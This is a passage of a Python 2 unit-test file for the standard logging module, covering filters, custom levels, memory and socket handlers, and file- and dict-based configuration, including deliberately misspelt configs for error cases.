GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_invalid_name(self):
self.assertRaises(TypeError, logging.getLogger, any)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
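# Once these names are registered via logging.addLevelName() (as done in
# CustomLevelsAndFiltersTest.setUp below), logger.log(VERBOSE, msg) is
# rendered with levelname 'Verbose'.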
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
    # config5 resolves the handler class from a dotted module path
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = cStringIO.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
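    # Wire format consumed above: each frame is a 4-byte big-endian length,
    # struct.pack(">L", len(payload)), followed by the pickled dict of a
    # LogRecord -- the same framing logging.handlers.SocketHandler emits.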
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
@unittest.skipIf(os.name=='java' and os._name=='nt',
'Blocks test completion on Jython Windows.')
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
    def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
        self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn)
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn)
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = u'\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = cStringIO.StringIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, '\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = cStringIO.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = cStringIO.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(StandardError, self.apply_config, self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    #Same as test_config7_ok but without disabling existing loggers.
def test_config_8_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
